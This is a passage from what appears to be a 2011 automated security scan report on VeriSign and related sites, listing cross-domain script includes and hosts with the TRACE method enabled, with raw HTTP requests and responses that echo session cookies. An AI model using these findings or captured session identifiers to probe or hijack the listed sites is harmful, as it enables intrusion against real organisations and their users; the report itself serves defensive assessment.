The response dynamically includes the following scripts from other domains:http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://www.verisign.com/js/mbox.js
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... </script><script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script>...[SNIP]... </p> <script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]... <!-- Promo script--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]... <!-- Pre-load promo images to display correctly in promo--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js"> </script>...[SNIP]...
15.36. http://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:https://www.googleadservices.com/pagead/conversion.js
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.37. http://www.verisign.com/code-signing/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/code-signing/index.html
Issue detail
The response dynamically includes the following scripts from other domains:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://www.googleadservices.com/pagead/conversion.js
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/index.html
Issue detail
The response dynamically includes the following script from another domain:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The response dynamically includes the following script from another domain:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The response dynamically includes the following script from another domain:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/ssl/buy-ssl-certificates/index.html
Issue detail
The response dynamically includes the following scripts from other domains:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://www.googleadservices.com/pagead/conversion.js
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.42. http://www.verisign.com/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/trust-seal/index.html
Issue detail
The response dynamically includes the following scripts from other domains:http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script>...[SNIP]...
15.43. http://www.verisign.com/verisign-worldwide/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/verisign-worldwide/index.html
Issue detail
The response dynamically includes the following script from another domain:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /verisign-worldwide/index.html?tid=footer HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:10 GMT Content-Type: text/html Content-Length: 42646 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.44. https://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:https://www.googleadservices.com/pagead/conversion.js
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.45. https://www.verisign.com/products-services/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/products-services/index.html
Issue detail
The response dynamically includes the following script from another domain:https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
16. TRACE method is enabled
previous
next
There are 7 instances of this issue:
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received. Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
16.1. http://1168.ic-live.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://1168.ic-live.com
Path:
/
Request
TRACE / HTTP/1.0 Host: 1168.ic-live.com Cookie: 3a8169a39c743817
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Content-Type: message/http X-Cache: MISS from i2a-coll-17 X-Cache-Lookup: NONE from i2a-coll-17:80 Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21) Connection: close TRACE / HTTP/1.0 Host: 1168.ic-live.com Cookie: 3a8169a39c743817 ; cvt586=106159628; ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; cvt522=33083100; sid1168=1315603546sI0iG1jH0qF3 Via: 1.0 i2a-coll-17:80 (squid/2.6.STABLE21) X-Forwarded-For: ...[SNIP]...
16.2. http://blogs.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: blogs.verisign.com Cookie: c714ff1fc488237d
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Content-Type: message/http Connection: close TRACE / HTTP/1.1 Host: blogapp:8080 Cookie: c714ff1fc488237d ; v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0...[SNIP]...
16.3. https://cert.webtrust.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cert.webtrust.org
Path:
/
Request
TRACE / HTTP/1.0 Host: cert.webtrust.org Cookie: 96a6b86bb9621aaa
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:31 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 mod_ssl/2.8.14 OpenSSL/0.9.7a Connection: close Content-Type: message/http TRACE / HTTP/1.0 Cookie: 96a6b86bb9621aaa Host: cert.webtrust.org
16.4. https://donate.mozilla.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/
Request
TRACE / HTTP/1.0 Host: donate.mozilla.org Cookie: f47eeb57d4e2c95f
Response
HTTP/1.1 200 OK Server: Apache Content-Type: message/http Date: Fri, 09 Sep 2011 22:14:47 GMT Connection: close Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ TRACE / HTTP/1.0 X-Cluster-SSL: 1 Host: donate.mozilla.org X-Cluster-Client-Ip: 50.23.123.106 Cookie: f47eeb57d4e2c95f ; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC; WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751 Connection: Keep-Alive
16.5. https://partnernet.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Request
TRACE / HTTP/1.0 Host: partnernet.symantec.com Cookie: aa6e229900a35a85
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: partnernet.symantec.com Cookie: aa6e229900a35a85 ; JSESSIONID=JpgsTqLJpsGcTPQ9r6vf2nW4Lnx1ZQCYB8m9fcNQn2D7vsdhGhHr!-248941162; s_sv_112_s1=1@16@a//1315621570007; SymantecMobile=false; IS3_History=0-0-0____; s_sq=%5B%5BB%5D%5D; bizProdScrollVertical=0...[SNIP]...
16.6. http://press.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://press.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: press.verisign.com Cookie: 356f27a0513049ad
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: press.verisign.com Cookie: 356f27a0513049ad ; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(...[SNIP]...
16.7. https://press.verisign.com/
previous
